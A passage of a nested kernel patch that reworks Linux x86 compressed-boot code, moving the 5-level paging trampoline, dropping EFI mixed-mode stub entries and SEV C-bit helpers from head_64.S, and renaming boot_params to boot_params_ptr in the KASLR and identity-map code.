+- * set up image_offset to tell us where the image actually starts, so that we
+- * can use the full available buffer.
+- *	image_offset = startup_32 - image_base
+- * Otherwise image_offset will be zero and has no effect on the calculations.
+- */
+-	subl    rva(image_offset)(%ebp), %ebx
+-#endif
+-
+ 	movl	BP_kernel_alignment(%esi), %eax
+ 	decl	%eax
+ 	addl	%eax, %ebx
+@@ -178,12 +167,13 @@ SYM_FUNC_START(startup_32)
+   */
+ 	/*
+ 	 * If SEV is active then set the encryption mask in the page tables.
+-	 * This will insure that when the kernel is copied and decompressed
++	 * This will ensure that when the kernel is copied and decompressed
+ 	 * it will be done so encrypted.
+ 	 */
+-	call	get_sev_encryption_bit
+ 	xorl	%edx, %edx
+ #ifdef	CONFIG_AMD_MEM_ENCRYPT
++	call	get_sev_encryption_bit
++	xorl	%edx, %edx
+ 	testl	%eax, %eax
+ 	jz	1f
+ 	subl	$32, %eax	/* Encryption bit is always above bit 31 */
+@@ -249,6 +239,11 @@ SYM_FUNC_START(startup_32)
+ 	movl    $__BOOT_TSS, %eax
+ 	ltr	%ax
+ 
++#ifdef CONFIG_AMD_MEM_ENCRYPT
++	/* Check if the C-bit position is correct when SEV is active */
++	call	startup32_check_sev_cbit
++#endif
++
+ 	/*
+ 	 * Setup for the jump to 64bit mode
+ 	 *
+@@ -261,29 +256,11 @@ SYM_FUNC_START(startup_32)
+ 	 */
+ 	leal	rva(startup_64)(%ebp), %eax
+ #ifdef CONFIG_EFI_MIXED
+-	movl	rva(efi32_boot_args)(%ebp), %edi
+-	testl	%edi, %edi
+-	jz	1f
+-	leal	rva(efi64_stub_entry)(%ebp), %eax
+-	movl	rva(efi32_boot_args+4)(%ebp), %esi
+-	movl	rva(efi32_boot_args+8)(%ebp), %edx	// saved bootparams pointer
+-	testl	%edx, %edx
+-	jnz	1f
+-	/*
+-	 * efi_pe_entry uses MS calling convention, which requires 32 bytes of
+-	 * shadow space on the stack even if all arguments are passed in
+-	 * registers. We also need an additional 8 bytes for the space that
+-	 * would be occupied by the return address, and this also results in
+-	 * the correct stack alignment for entry.
+-	 */
+-	subl	$40, %esp
+-	leal	rva(efi_pe_entry)(%ebp), %eax
+-	movl	%edi, %ecx			// MS calling convention
+-	movl	%esi, %edx
++	cmpb	$1, rva(efi_is64)(%ebp)
++	je	1f
++	leal	rva(startup_64_mixed_mode)(%ebp), %eax
+ 1:
+ #endif
+-	/* Check if the C-bit position is correct when SEV is active */
+-	call	startup32_check_sev_cbit
+ 
+ 	pushl	$__KERNEL_CS
+ 	pushl	%eax
+@@ -296,41 +273,6 @@ SYM_FUNC_START(startup_32)
+ 	lret
+ SYM_FUNC_END(startup_32)
+ 
+-#ifdef CONFIG_EFI_MIXED
+-	.org 0x190
+-SYM_FUNC_START(efi32_stub_entry)
+-	add	$0x4, %esp		/* Discard return address */
+-	popl	%ecx
+-	popl	%edx
+-	popl	%esi
+-
+-	call	1f
+-1:	pop	%ebp
+-	subl	$ rva(1b), %ebp
+-
+-	movl	%esi, rva(efi32_boot_args+8)(%ebp)
+-SYM_INNER_LABEL(efi32_pe_stub_entry, SYM_L_LOCAL)
+-	movl	%ecx, rva(efi32_boot_args)(%ebp)
+-	movl	%edx, rva(efi32_boot_args+4)(%ebp)
+-	movb	$0, rva(efi_is64)(%ebp)
+-
+-	/* Save firmware GDTR and code/data selectors */
+-	sgdtl	rva(efi32_boot_gdt)(%ebp)
+-	movw	%cs, rva(efi32_boot_cs)(%ebp)
+-	movw	%ds, rva(efi32_boot_ds)(%ebp)
+-
+-	/* Store firmware IDT descriptor */
+-	sidtl	rva(efi32_boot_idt)(%ebp)
+-
+-	/* Disable paging */
+-	movl	%cr0, %eax
+-	btrl	$X86_CR0_PG_BIT, %eax
+-	movl	%eax, %cr0
+-
+-	jmp	startup_32
+-SYM_FUNC_END(efi32_stub_entry)
+-#endif
+-
+ 	.code64
+ 	.org 0x200
+ SYM_CODE_START(startup_64)
+@@ -372,20 +314,6 @@ SYM_CODE_START(startup_64)
+ 	/* Start with the delta to where the kernel will run at. */
+ #ifdef CONFIG_RELOCATABLE
+ 	leaq	startup_32(%rip) /* - $startup_32 */, %rbp
+-
+-#ifdef CONFIG_EFI_STUB
+-/*
+- * If we were loaded via the EFI LoadImage service, startup_32 will be at an
+- * offset to the start of the space allocated for the image. efi_pe_entry will
+- * set up image_offset to tell us where the image actually starts, so that we
+- * can use the full available buffer.
+- *	image_offset = startup_32 - image_base
+- * Otherwise image_offset will be zero and has no effect on the calculations.
+- */
+-	movl    image_offset(%rip), %eax
+-	subq	%rax, %rbp
+-#endif
+-
+ 	movl	BP_kernel_alignment(%rsi), %eax
+ 	decl	%eax
+ 	addq	%rax, %rbp
+@@ -424,10 +352,6 @@ SYM_CODE_START(startup_64)
+ 	 * For the trampoline, we need the top page table to reside in lower
+ 	 * memory as we don't have a way to load 64-bit values into CR3 in
+ 	 * 32-bit mode.
+-	 *
+-	 * We go though the trampoline even if we don't have to: if we're
+-	 * already in a desired paging mode. This way the trampoline code gets
+-	 * tested on every boot.
+ 	 */
+ 
+ 	/* Make sure we have GDT with 32-bit code segment */
+@@ -442,10 +366,14 @@ SYM_CODE_START(startup_64)
+ 	lretq
+ 
+ .Lon_kernel_cs:
++	/*
++	 * RSI holds a pointer to a boot_params structure provided by the
++	 * loader, and this needs to be preserved across C function calls. So
++	 * move it into a callee saved register.
++	 */
++	movq	%rsi, %r15
+ 
+-	pushq	%rsi
+ 	call	load_stage1_idt
+-	popq	%rsi
+ 
+ #ifdef CONFIG_AMD_MEM_ENCRYPT
+ 	/*
+@@ -456,82 +384,24 @@ SYM_CODE_START(startup_64)
+ 	 * CPUID instructions being issued, so go ahead and do that now via
+ 	 * sev_enable(), which will also handle the rest of the SEV-related
+ 	 * detection/setup to ensure that has been done in advance of any dependent
+-	 * code.
++	 * code. Pass the boot_params pointer as the first argument.
+ 	 */
+-	pushq	%rsi
+-	movq	%rsi, %rdi		/* real mode address */
++	movq	%r15, %rdi
+ 	call	sev_enable
+-	popq	%rsi
+ #endif
+ 
+ 	/*
+-	 * paging_prepare() sets up the trampoline and checks if we need to
+-	 * enable 5-level paging.
+-	 *
+-	 * paging_prepare() returns a two-quadword structure which lands
+-	 * into RDX:RAX:
+-	 *   - Address of the trampoline is returned in RAX.
+-	 *   - Non zero RDX means trampoline needs to enable 5-level
+-	 *     paging.
+-	 *
+-	 * RSI holds real mode data and needs to be preserved across
+-	 * this function call.
+-	 */
+-	pushq	%rsi
+-	movq	%rsi, %rdi		/* real mode address */
+-	call	paging_prepare
+-	popq	%rsi
+-
+-	/* Save the trampoline address in RCX */
+-	movq	%rax, %rcx
+-
+-	/* Set up 32-bit addressable stack */
+-	leaq	TRAMPOLINE_32BIT_STACK_END(%rcx), %rsp
+-
+-	/*
+-	 * Preserve live 64-bit registers on the stack: this is necessary
+-	 * because the architecture does not guarantee that GPRs will retain
+-	 * their full 64-bit values across a 32-bit mode switch.
+-	 */
+-	pushq	%rbp
+-	pushq	%rbx
+-	pushq	%rsi
+-
+-	/*
+-	 * Push the 64-bit address of trampoline_return() onto the new stack.
+-	 * It will be used by the trampoline to return to the main code. Due to
+-	 * the 32-bit mode switch, it cannot be kept it in a register either.
+-	 */
+-	leaq	trampoline_return(%rip), %rdi
+-	pushq	%rdi
+-
+-	/* Switch to compatibility mode (CS.L = 0 CS.D = 1) via far return */
+-	pushq	$__KERNEL32_CS
+-	leaq	TRAMPOLINE_32BIT_CODE_OFFSET(%rax), %rax
+-	pushq	%rax
+-	lretq
+-trampoline_return:
+-	/* Restore live 64-bit registers */
+-	popq	%rsi
+-	popq	%rbx
+-	popq	%rbp
+-
+-	/* Restore the stack, the 32-bit trampoline uses its own stack */
+-	leaq	rva(boot_stack_end)(%rbx), %rsp
+-
+-	/*
+-	 * cleanup_trampoline() would restore trampoline memory.
+-	 *
+-	 * RDI is address of the page table to use instead of page table
+-	 * in trampoline memory (if required).
++	 * configure_5level_paging() updates the number of paging levels using
++	 * a trampoline in 32-bit addressable memory if the current number does
++	 * not match the desired number.
+ 	 *
+-	 * RSI holds real mode data and needs to be preserved across
+-	 * this function call.
++	 * Pass the boot_params pointer as the first argument. The second
++	 * argument is the relocated address of the page table to use instead
++	 * of the page table in trampoline memory (if required).
+ 	 */
+-	pushq	%rsi
+-	leaq	rva(top_pgtable)(%rbx), %rdi
+-	call	cleanup_trampoline
+-	popq	%rsi
++	movq	%r15, %rdi
++	leaq	rva(top_pgtable)(%rbx), %rsi
++	call	configure_5level_paging
+ 
+ 	/* Zero EFLAGS */
+ 	pushq	$0
+@@ -541,7 +411,6 @@ trampoline_return:
+  * Copy the compressed kernel to the end of our buffer
+  * where decompression in place becomes safe.
+  */
+-	pushq	%rsi
+ 	leaq	(_bss-8)(%rip), %rsi
+ 	leaq	rva(_bss-8)(%rbx), %rdi
+ 	movl	$(_bss - startup_32), %ecx
+@@ -549,7 +418,6 @@ trampoline_return:
+ 	std
+ 	rep	movsq
+ 	cld
+-	popq	%rsi
+ 
+ 	/*
+ 	 * The GDT may get overwritten either during the copy we just did or
+@@ -568,19 +436,6 @@ trampoline_return:
+ 	jmp	*%rax
+ SYM_CODE_END(startup_64)
+ 
+-#ifdef CONFIG_EFI_STUB
+-	.org 0x390
+-SYM_FUNC_START(efi64_stub_entry)
+-	and	$~0xf, %rsp			/* realign the stack */
+-	movq	%rdx, %rbx			/* save boot_params pointer */
+-	call	efi_main
+-	movq	%rbx,%rsi
+-	leaq	rva(startup_64)(%rax), %rax
+-	jmp	*%rax
+-SYM_FUNC_END(efi64_stub_entry)
+-SYM_FUNC_ALIAS(efi_stub_entry, efi64_stub_entry)
+-#endif
+-
+ 	.text
+ SYM_FUNC_START_LOCAL_NOALIGN(.Lrelocated)
+ 
+@@ -594,125 +449,122 @@ SYM_FUNC_START_LOCAL_NOALIGN(.Lrelocated)
+ 	shrq	$3, %rcx
+ 	rep	stosq
+ 
+-	pushq	%rsi
+ 	call	load_stage2_idt
+ 
+ 	/* Pass boot_params to initialize_identity_maps() */
+-	movq	(%rsp), %rdi
++	movq	%r15, %rdi
+ 	call	initialize_identity_maps
+-	popq	%rsi
+ 
+ /*
+  * Do the extraction, and jump to the new kernel..
+  */
+-	pushq	%rsi			/* Save the real mode argument */
+-	movq	%rsi, %rdi		/* real mode address */
+-	leaq	boot_heap(%rip), %rsi	/* malloc area for uncompression */
+-	leaq	input_data(%rip), %rdx  /* input_data */
+-	movl	input_len(%rip), %ecx	/* input_len */
+-	movq	%rbp, %r8		/* output target address */
+-	movl	output_len(%rip), %r9d	/* decompressed length, end of relocs */
+-	call	extract_kernel		/* returns kernel location in %rax */
+-	popq	%rsi
++	/* pass struct boot_params pointer and output target address */
++	movq	%r15, %rdi
++	movq	%rbp, %rsi
++	call	extract_kernel		/* returns kernel entry point in %rax */
+ 
+ /*
+  * Jump to the decompressed kernel.
+  */
++	movq	%r15, %rsi
+ 	jmp	*%rax
+ SYM_FUNC_END(.Lrelocated)
+ 
+-	.code32
+ /*
+- * This is the 32-bit trampoline that will be copied over to low memory.
++ * This is the 32-bit trampoline that will be copied over to low memory. It
++ * will be called using the ordinary 64-bit calling convention from code
++ * running in 64-bit mode.
+  *
+  * Return address is at the top of the stack (might be above 4G).
+- * ECX contains the base address of the trampoline memory.
+- * Non zero RDX means trampoline needs to enable 5-level paging.
++ * The first argument (EDI) contains the address of the temporary PGD level
++ * page table in 32-bit addressable memory which will be programmed into
++ * register CR3.
+  */
++	.section ".rodata", "a", @progbits
+ SYM_CODE_START(trampoline_32bit_src)
+-	/* Set up data and stack segments */
+-	movl	$__KERNEL_DS, %eax
+-	movl	%eax, %ds
+-	movl	%eax, %ss
++	/*
++	 * Preserve callee save 64-bit registers on the stack: this is
++	 * necessary because the architecture does not guarantee that GPRs will
++	 * retain their full 64-bit values across a 32-bit mode switch.
++	 */
++	pushq	%r15
++	pushq	%r14
++	pushq	%r13
++	pushq	%r12
++	pushq	%rbp
++	pushq	%rbx
++
++	/* Preserve top half of RSP in a legacy mode GPR to avoid truncation */
++	movq	%rsp, %rbx
++	shrq	$32, %rbx
+ 
++	/* Switch to compatibility mode (CS.L = 0 CS.D = 1) via far return */
++	pushq	$__KERNEL32_CS
++	leaq	0f(%rip), %rax
++	pushq	%rax
++	lretq
++
++	/*
++	 * The 32-bit code below will do a far jump back to long mode and end
++	 * up here after reconfiguring the number of paging levels. First, the
++	 * stack pointer needs to be restored to its full 64-bit value before
++	 * the callee save register contents can be popped from the stack.
++	 */
++.Lret:
++	shlq	$32, %rbx
++	orq	%rbx, %rsp
++
++	/* Restore the preserved 64-bit registers */
++	popq	%rbx
++	popq	%rbp
++	popq	%r12
++	popq	%r13
++	popq	%r14
++	popq	%r15
++	retq
++
++	.code32
++0:
+ 	/* Disable paging */
+ 	movl	%cr0, %eax
+ 	btrl	$X86_CR0_PG_BIT, %eax
+ 	movl	%eax, %cr0
+ 
+-	/* Check what paging mode we want to be in after the trampoline */
+-	testl	%edx, %edx
+-	jz	1f
+-
+-	/* We want 5-level paging: don't touch CR3 if it already points to 5-level page tables */
+-	movl	%cr4, %eax
+-	testl	$X86_CR4_LA57, %eax
+-	jnz	3f
+-	jmp	2f
+-1:
+-	/* We want 4-level paging: don't touch CR3 if it already points to 4-level page tables */
+-	movl	%cr4, %eax
+-	testl	$X86_CR4_LA57, %eax
+-	jz	3f
+-2:
+ 	/* Point CR3 to the trampoline's new top level page table */
+-	leal	TRAMPOLINE_32BIT_PGTABLE_OFFSET(%ecx), %eax
+-	movl	%eax, %cr3
+-3:
++	movl	%edi, %cr3
++
+ 	/* Set EFER.LME=1 as a precaution in case hypervsior pulls the rug */
+-	pushl	%ecx
+-	pushl	%edx
+ 	movl	$MSR_EFER, %ecx
+ 	rdmsr
+ 	btsl	$_EFER_LME, %eax
+ 	/* Avoid writing EFER if no change was made (for TDX guest) */
+ 	jc	1f
+ 	wrmsr
+-1:	popl	%edx
+-	popl	%ecx
+-
+-#ifdef CONFIG_X86_MCE
+-	/*
+-	 * Preserve CR4.MCE if the kernel will enable #MC support.
+-	 * Clearing MCE may fault in some environments (that also force #MC
+-	 * support). Any machine check that occurs before #MC support is fully
+-	 * configured will crash the system regardless of the CR4.MCE value set
+-	 * here.
+-	 */
+-	movl	%cr4, %eax
+-	andl	$X86_CR4_MCE, %eax
+-#else
+-	movl	$0, %eax
+-#endif
+-
+-	/* Enable PAE and LA57 (if required) paging modes */
+-	orl	$X86_CR4_PAE, %eax
+-	testl	%edx, %edx
+-	jz	1f
+-	orl	$X86_CR4_LA57, %eax
+ 1:
++	/* Toggle CR4.LA57 */
++	movl	%cr4, %eax
++	btcl	$X86_CR4_LA57_BIT, %eax
+ 	movl	%eax, %cr4
+ 
+-	/* Calculate address of paging_enabled() once we are executing in the trampoline */
+-	leal	.Lpaging_enabled - trampoline_32bit_src + TRAMPOLINE_32BIT_CODE_OFFSET(%ecx), %eax
+-
+-	/* Prepare the stack for far return to Long Mode */
+-	pushl	$__KERNEL_CS
+-	pushl	%eax
+-
+ 	/* Enable paging again. */
+ 	movl	%cr0, %eax
+ 	btsl	$X86_CR0_PG_BIT, %eax
+ 	movl	%eax, %cr0
+ 
+-	lret
++	/*
++	 * Return to the 64-bit calling code using LJMP rather than LRET, to
++	 * avoid the need for a 32-bit addressable stack. The destination
++	 * address will be adjusted after the template code is copied into a
++	 * 32-bit addressable buffer.
++	 */
++.Ljmp:	ljmpl	$__KERNEL_CS, $(.Lret - trampoline_32bit_src)
+ SYM_CODE_END(trampoline_32bit_src)
+ 
+-	.code64
+-SYM_FUNC_START_LOCAL_NOALIGN(.Lpaging_enabled)
+-	/* Return from the trampoline */
+-	retq
+-SYM_FUNC_END(.Lpaging_enabled)
++/*
++ * This symbol is placed right after trampoline_32bit_src() so its address can
++ * be used to infer the size of the trampoline code.
++ */
++SYM_DATA(trampoline_ljmp_imm_offset, .word  .Ljmp + 1 - trampoline_32bit_src)
+ 
+ 	/*
+          * The trampoline code has a size limit.
+@@ -721,7 +573,7 @@ SYM_FUNC_END(.Lpaging_enabled)
+ 	 */
+ 	.org	trampoline_32bit_src + TRAMPOLINE_32BIT_CODE_SIZE
+ 
+-	.code32
++	.text
+ SYM_FUNC_START_LOCAL_NOALIGN(.Lno_longmode)
+ 	/* This isn't an x86-64 CPU, so hang intentionally, we cannot continue */
+ 1:
+@@ -729,6 +581,7 @@ SYM_FUNC_START_LOCAL_NOALIGN(.Lno_longmode)
+ 	jmp     1b
+ SYM_FUNC_END(.Lno_longmode)
+ 
++	.globl	verify_cpu
+ #include "../../kernel/verify_cpu.S"
+ 
+ 	.data
+@@ -760,249 +613,11 @@ SYM_DATA_START(boot_idt)
+ 	.endr
+ SYM_DATA_END_LABEL(boot_idt, SYM_L_GLOBAL, boot_idt_end)
+ 
+-#ifdef CONFIG_AMD_MEM_ENCRYPT
+-SYM_DATA_START(boot32_idt_desc)
+-	.word   boot32_idt_end - boot32_idt - 1
+-	.long   0
+-SYM_DATA_END(boot32_idt_desc)
+-	.balign 8
+-SYM_DATA_START(boot32_idt)
+-	.rept 32
+-	.quad 0
+-	.endr
+-SYM_DATA_END_LABEL(boot32_idt, SYM_L_GLOBAL, boot32_idt_end)
+-#endif
+-
+-#ifdef CONFIG_EFI_STUB
+-SYM_DATA(image_offset, .long 0)
+-#endif
+-#ifdef CONFIG_EFI_MIXED
+-SYM_DATA_LOCAL(efi32_boot_args, .long 0, 0, 0)
+-SYM_DATA(efi_is64, .byte 1)
+-
+-#define ST32_boottime		60 // offsetof(efi_system_table_32_t, boottime)
+-#define BS32_handle_protocol	88 // offsetof(efi_boot_services_32_t, handle_protocol)
+-#define LI32_image_base		32 // offsetof(efi_loaded_image_32_t, image_base)
+-
+-	__HEAD
+-	.code32
+-SYM_FUNC_START(efi32_pe_entry)
+-/*
+- * efi_status_t efi32_pe_entry(efi_handle_t image_handle,
+- *			       efi_system_table_32_t *sys_table)
+- */
+-
+-	pushl	%ebp
+-	movl	%esp, %ebp
+-	pushl	%eax				// dummy push to allocate loaded_image
+-
+-	pushl	%ebx				// save callee-save registers
+-	pushl	%edi
+-
+-	call	verify_cpu			// check for long mode support
+-	testl	%eax, %eax
+-	movl	$0x80000003, %eax		// EFI_UNSUPPORTED
+-	jnz	2f
+-
+-	call	1f
+-1:	pop	%ebx
+-	subl	$ rva(1b), %ebx
+-
+-	/* Get the loaded image protocol pointer from the image handle */
+-	leal	-4(%ebp), %eax
+-	pushl	%eax				// &loaded_image
+-	leal	rva(loaded_image_proto)(%ebx), %eax
+-	pushl	%eax				// pass the GUID address
+-	pushl	8(%ebp)				// pass the image handle
+-
+-	/*
+-	 * Note the alignment of the stack frame.
+-	 *   sys_table
+-	 *   handle             <-- 16-byte aligned on entry by ABI
+-	 *   return address
+-	 *   frame pointer
+-	 *   loaded_image       <-- local variable
+-	 *   saved %ebx		<-- 16-byte aligned here
+-	 *   saved %edi
+-	 *   &loaded_image
+-	 *   &loaded_image_proto
+-	 *   handle             <-- 16-byte aligned for call to handle_protocol
+-	 */
+-
+-	movl	12(%ebp), %eax			// sys_table
+-	movl	ST32_boottime(%eax), %eax	// sys_table->boottime
+-	call	*BS32_handle_protocol(%eax)	// sys_table->boottime->handle_protocol
+-	addl	$12, %esp			// restore argument space
+-	testl	%eax, %eax
+-	jnz	2f
+-
+-	movl	8(%ebp), %ecx			// image_handle
+-	movl	12(%ebp), %edx			// sys_table
+-	movl	-4(%ebp), %esi			// loaded_image
+-	movl	LI32_image_base(%esi), %esi	// loaded_image->image_base
+-	movl	%ebx, %ebp			// startup_32 for efi32_pe_stub_entry
+-	/*
+-	 * We need to set the image_offset variable here since startup_32() will
+-	 * use it before we get to the 64-bit efi_pe_entry() in C code.
+-	 */
+-	subl	%esi, %ebx
+-	movl	%ebx, rva(image_offset)(%ebp)	// save image_offset
+-	jmp	efi32_pe_stub_entry
+-
+-2:	popl	%edi				// restore callee-save registers
+-	popl	%ebx
+-	leave
+-	RET
+-SYM_FUNC_END(efi32_pe_entry)
+-
+-	.section ".rodata"
+-	/* EFI loaded image protocol GUID */
+-	.balign 4
+-SYM_DATA_START_LOCAL(loaded_image_proto)
+-	.long	0x5b1b31a1
+-	.word	0x9562, 0x11d2
+-	.byte	0x8e, 0x3f, 0x00, 0xa0, 0xc9, 0x69, 0x72, 0x3b
+-SYM_DATA_END(loaded_image_proto)
+-#endif
+-
+-#ifdef CONFIG_AMD_MEM_ENCRYPT
+-	__HEAD
+-	.code32
+-/*
+- * Write an IDT entry into boot32_idt
+- *
+- * Parameters:
+- *
+- * %eax:	Handler address
+- * %edx:	Vector number
+- *
+- * Physical offset is expected in %ebp
+- */
+-SYM_FUNC_START(startup32_set_idt_entry)
+-	push    %ebx
+-	push    %ecx
+-
+-	/* IDT entry address to %ebx */
+-	leal    rva(boot32_idt)(%ebp), %ebx
+-	shl	$3, %edx
+-	addl    %edx, %ebx
+-
+-	/* Build IDT entry, lower 4 bytes */
+-	movl    %eax, %edx
+-	andl    $0x0000ffff, %edx	# Target code segment offset [15:0]
+-	movl    $__KERNEL32_CS, %ecx	# Target code segment selector
+-	shl     $16, %ecx
+-	orl     %ecx, %edx
+-
+-	/* Store lower 4 bytes to IDT */
+-	movl    %edx, (%ebx)
+-
+-	/* Build IDT entry, upper 4 bytes */
+-	movl    %eax, %edx
+-	andl    $0xffff0000, %edx	# Target code segment offset [31:16]
+-	orl     $0x00008e00, %edx	# Present, Type 32-bit Interrupt Gate
+-
+-	/* Store upper 4 bytes to IDT */
+-	movl    %edx, 4(%ebx)
+-
+-	pop     %ecx
+-	pop     %ebx
+-	RET
+-SYM_FUNC_END(startup32_set_idt_entry)
+-#endif
+-
+-SYM_FUNC_START(startup32_load_idt)
+-#ifdef CONFIG_AMD_MEM_ENCRYPT
+-	/* #VC handler */
+-	leal    rva(startup32_vc_handler)(%ebp), %eax
+-	movl    $X86_TRAP_VC, %edx
+-	call    startup32_set_idt_entry
+-
+-	/* Load IDT */
+-	leal	rva(boot32_idt)(%ebp), %eax
+-	movl	%eax, rva(boot32_idt_desc+2)(%ebp)
+-	lidt    rva(boot32_idt_desc)(%ebp)
+-#endif
+-	RET
+-SYM_FUNC_END(startup32_load_idt)
+-
+-/*
+- * Check for the correct C-bit position when the startup_32 boot-path is used.
+- *
+- * The check makes use of the fact that all memory is encrypted when paging is
+- * disabled. The function creates 64 bits of random data using the RDRAND
+- * instruction. RDRAND is mandatory for SEV guests, so always available. If the
+- * hypervisor violates that the kernel will crash right here.
+- *
+- * The 64 bits of random data are stored to a memory location and at the same
+- * time kept in the %eax and %ebx registers. Since encryption is always active
+- * when paging is off the random data will be stored encrypted in main memory.
+- *
+- * Then paging is enabled. When the C-bit position is correct all memory is
+- * still mapped encrypted and comparing the register values with memory will
+- * succeed. An incorrect C-bit position will map all memory unencrypted, so that
+- * the compare will use the encrypted random data and fail.
+- */
+-SYM_FUNC_START(startup32_check_sev_cbit)
+-#ifdef CONFIG_AMD_MEM_ENCRYPT
+-	pushl	%eax
+-	pushl	%ebx
+-	pushl	%ecx
+-	pushl	%edx
+-
+-	/* Check for non-zero sev_status */
+-	movl	rva(sev_status)(%ebp), %eax
+-	testl	%eax, %eax
+-	jz	4f
+-
+-	/*
+-	 * Get two 32-bit random values - Don't bail out if RDRAND fails
+-	 * because it is better to prevent forward progress if no random value
+-	 * can be gathered.
+-	 */
+-1:	rdrand	%eax
+-	jnc	1b
+-2:	rdrand	%ebx
+-	jnc	2b
+-
+-	/* Store to memory and keep it in the registers */
+-	movl	%eax, rva(sev_check_data)(%ebp)
+-	movl	%ebx, rva(sev_check_data+4)(%ebp)
+-
+-	/* Enable paging to see if encryption is active */
+-	movl	%cr0, %edx			 /* Backup %cr0 in %edx */
+-	movl	$(X86_CR0_PG | X86_CR0_PE), %ecx /* Enable Paging and Protected mode */
+-	movl	%ecx, %cr0
+-
+-	cmpl	%eax, rva(sev_check_data)(%ebp)
+-	jne	3f
+-	cmpl	%ebx, rva(sev_check_data+4)(%ebp)
+-	jne	3f
+-
+-	movl	%edx, %cr0	/* Restore previous %cr0 */
+-
+-	jmp	4f
+-
+-3:	/* Check failed - hlt the machine */
+-	hlt
+-	jmp	3b
+-
+-4:
+-	popl	%edx
+-	popl	%ecx
+-	popl	%ebx
+-	popl	%eax
+-#endif
+-	RET
+-SYM_FUNC_END(startup32_check_sev_cbit)
+-
+ /*
+  * Stack and heap for uncompression
+  */
+ 	.bss
+ 	.balign 4
+-SYM_DATA_LOCAL(boot_heap,	.fill BOOT_HEAP_SIZE, 1, 0)
+-
+ SYM_DATA_START_LOCAL(boot_stack)
+ 	.fill BOOT_STACK_SIZE, 1, 0
+ 	.balign 16
+diff --git a/arch/x86/boot/compressed/ident_map_64.c b/arch/x86/boot/compressed/ident_map_64.c
+index d34222816c9f5..b8c42339bc355 100644
+--- a/arch/x86/boot/compressed/ident_map_64.c
++++ b/arch/x86/boot/compressed/ident_map_64.c
+@@ -167,8 +167,9 @@ void initialize_identity_maps(void *rmode)
+ 	 * or does not touch all the pages covering them.
+ 	 */
+ 	kernel_add_identity_map((unsigned long)_head, (unsigned long)_end);
+-	boot_params = rmode;
+-	kernel_add_identity_map((unsigned long)boot_params, (unsigned long)(boot_params + 1));
++	boot_params_ptr = rmode;
++	kernel_add_identity_map((unsigned long)boot_params_ptr,
++				(unsigned long)(boot_params_ptr + 1));
+ 	cmdline = get_cmd_line_ptr();
+ 	kernel_add_identity_map(cmdline, cmdline + COMMAND_LINE_SIZE);
+ 
+@@ -176,7 +177,7 @@ void initialize_identity_maps(void *rmode)
+ 	 * Also map the setup_data entries passed via boot_params in case they
+ 	 * need to be accessed by uncompressed kernel via the identity mapping.
+ 	 */
+-	sd = (struct setup_data *)boot_params->hdr.setup_data;
++	sd = (struct setup_data *)boot_params_ptr->hdr.setup_data;
+ 	while (sd) {
+ 		unsigned long sd_addr = (unsigned long)sd;
+ 
+diff --git a/arch/x86/boot/compressed/kaslr.c b/arch/x86/boot/compressed/kaslr.c
+index e476bcbd9b422..9794d9174795d 100644
+--- a/arch/x86/boot/compressed/kaslr.c
++++ b/arch/x86/boot/compressed/kaslr.c
+@@ -63,7 +63,7 @@ static unsigned long get_boot_seed(void)
+ 	unsigned long hash = 0;
+ 
+ 	hash = rotate_xor(hash, build_str, sizeof(build_str));
+-	hash = rotate_xor(hash, boot_params, sizeof(*boot_params));
++	hash = rotate_xor(hash, boot_params_ptr, sizeof(*boot_params_ptr));
+ 
+ 	return hash;
+ }
+@@ -383,7 +383,7 @@ static void handle_mem_options(void)
+ static void mem_avoid_init(unsigned long input, unsigned long input_size,
+ 			   unsigned long output)
+ {
+-	unsigned long init_size = boot_params->hdr.init_size;
++	unsigned long init_size = boot_params_ptr->hdr.init_size;
+ 	u64 initrd_start, initrd_size;
+ 	unsigned long cmd_line, cmd_line_size;
+ 
+@@ -395,10 +395,10 @@ static void mem_avoid_init(unsigned long input, unsigned long input_size,
+ 	mem_avoid[MEM_AVOID_ZO_RANGE].size = (output + init_size) - input;
+ 
+ 	/* Avoid initrd. */
+-	initrd_start  = (u64)boot_params->ext_ramdisk_image << 32;
+-	initrd_start |= boot_params->hdr.ramdisk_image;
+-	initrd_size  = (u64)boot_params->ext_ramdisk_size << 32;
+-	initrd_size |= boot_params->hdr.ramdisk_size;
++	initrd_start  = (u64)boot_params_ptr->ext_ramdisk_image << 32;
++	initrd_start |= boot_params_ptr->hdr.ramdisk_image;
++	initrd_size  = (u64)boot_params_ptr->ext_ramdisk_size << 32;
++	initrd_size |= boot_params_ptr->hdr.ramdisk_size;
+ 	mem_avoid[MEM_AVOID_INITRD].start = initrd_start;
+ 	mem_avoid[MEM_AVOID_INITRD].size = initrd_size;
+ 	/* No need to set mapping for initrd, it will be handled in VO. */
+@@ -413,8 +413,8 @@ static void mem_avoid_init(unsigned long input, unsigned long input_size,
+ 	}
+ 
+ 	/* Avoid boot parameters. */
+-	mem_avoid[MEM_AVOID_BOOTPARAMS].start = (unsigned long)boot_params;
+-	mem_avoid[MEM_AVOID_BOOTPARAMS].size = sizeof(*boot_params);
++	mem_avoid[MEM_AVOID_BOOTPARAMS].start = (unsigned long)boot_params_ptr;
++	mem_avoid[MEM_AVOID_BOOTPARAMS].size = sizeof(*boot_params_ptr);
+ 
+ 	/* We don't need to set a mapping for setup_data. */
+ 
+@@ -447,7 +447,7 @@ static bool mem_avoid_overlap(struct mem_vector *img,
+ 	}
+ 
+ 	/* Avoid all entries in the setup_data linked list. */
+-	ptr = (struct setup_data *)(unsigned long)boot_params->hdr.setup_data;
++	ptr = (struct setup_data *)(unsigned long)boot_params_ptr->hdr.setup_data;
+ 	while (ptr) {
+ 		struct mem_vector avoid;
+ 
+@@ -679,7 +679,7 @@ static bool process_mem_region(struct mem_vector *region,
+ static bool
+ process_efi_entries(unsigned long minimum, unsigned long image_size)
+ {
+-	struct efi_info *e = &boot_params->efi_info;
++	struct efi_info *e = &boot_params_ptr->efi_info;
+ 	bool efi_mirror_found = false;
+ 	struct mem_vector region;
+ 	efi_memory_desc_t *md;
+@@ -761,8 +761,8 @@ static void process_e820_entries(unsigned long minimum,
+ 	struct boot_e820_entry *entry;
+ 
+ 	/* Verify potential e820 positions, appending to slots list. */
+-	for (i = 0; i < boot_params->e820_entries; i++) {
+-		entry = &boot_params->e820_table[i];
++	for (i = 0; i < boot_params_ptr->e820_entries; i++) {
++		entry = &boot_params_ptr->e820_table[i];
+ 		/* Skip non-RAM entries. */
+ 		if (entry->type != E820_TYPE_RAM)
+ 			continue;
+@@ -836,7 +836,7 @@ void choose_random_location(unsigned long input,
+ 		return;
+ 	}
+ 
+-	boot_params->hdr.loadflags |= KASLR_FLAG;
